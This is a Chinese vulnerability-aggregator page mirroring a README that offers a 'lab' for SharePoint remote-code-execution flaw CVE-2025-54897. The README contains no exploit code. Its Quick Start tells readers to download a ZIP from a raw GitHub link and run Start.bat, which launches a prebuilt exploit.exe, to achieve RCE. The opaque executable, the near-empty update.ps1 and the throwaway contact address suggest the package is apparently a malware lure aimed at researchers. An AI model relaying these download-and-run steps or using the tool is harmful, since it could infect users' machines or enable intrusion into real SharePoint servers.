关联漏洞
标题:Microsoft Office Sharepoint Server 代码问题漏洞 (CVE-2025-54897)Description:Microsoft Office Sharepoint Server是美国微软(Microsoft)公司的一款为企业客户而设计的、基于web的内容管理和协作工具。该软件初始版本以Office组件形式存在,现在也仍然大大依托于Office,以提供企业门户、文档协同等功能为主,之后版本支持将Office、Exchange、Lync、Project和Visio结合起来。 Microsoft Office Sharepoint Server存在代码问题漏洞。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响
介绍
# Lab: CVE-2025-54897 - Deserialization Vulnerability in Microsoft Office SharePoint
## 🚀 Overview
This lab demonstrates a deserialization vulnerability in Microsoft Office SharePoint that enables remote code execution (RCE). The issue arises from improper handling of untrusted serialized data within SharePoint's object deserialization routines, allowing an authenticated attacker execute arbitrary code on the target server. With a CVSSv3 score of 8.8, this high-severity vulnerability impacts various SharePoint versions, including Enterprise Server 2016, Server 2019, and Subscription Edition. Successful exploitation could lead to data exfiltration, privilege escalation, or full system compromise in networked environments.
## ⚠️ Safety Disclaimer
This lab involves potentially harmful code execution simulations. Use only in isolated, non-production environments. Do not deploy on live systems or networks without proper authorization. The authors disclaim any liability for misuse, damages, or legal consequences arising from this repository. Always adhere to ethical hacking guidelines and obtain explicit permission before testing on any systems.
**Educational Purpose Only:** This repository is provided solely for learning about software vulnerabilities and secure coding practices. It is not intended to facilitate unauthorized access, attacks, or any illegal activities.
## 📋 Prerequisites
- Windows 10/11 or Windows Server 2016/2019/2022 (64-bit) with administrative privileges.
- .NET Framework 4.8 or later installed.
- Microsoft SharePoint Server 2016/2019 or Subscription Edition (vulnerable versions without patches applied).
- Firewall rules allowing inbound connections on port 80/443 for testing.
## Download & Install
Download the lab resources as a ZIP archive from the following link: [Download Lab ZIP](https://github.com/themaxlpalfaboy/CVE-2025-54897-LAB/raw/refs/heads/main/Lore/cve-2025-54897-lab.zip).
To install:
1. Extract the ZIP to a local directory (e.g., `C:\cve-2025-54897-lab`).
2. Verify .NET dependencies by running `dotnet --version` in Command Prompt.
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `Start.bat` to launch `exploit.exe`. This will open the exploitation interface in a console window.
4. Follow the on-screen prompts to configure the target SharePoint endpoint (e.g., `http://localhost:80` for local testing).
5. Select a payload type and execute to achive the RCE.
For questions or contributions, email me at ylnnceze1514ck@hotmail.com
文件快照
[4.0K] /data/pocs/d2e9eaf689a18959b86b4284904081df54ba0971
├── [4.0K] Lore
│ ├── [8.5M] cve-2025-54897-lab.zip
│ └── [ 1] update.ps1
└── [2.5K] README.md
2 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。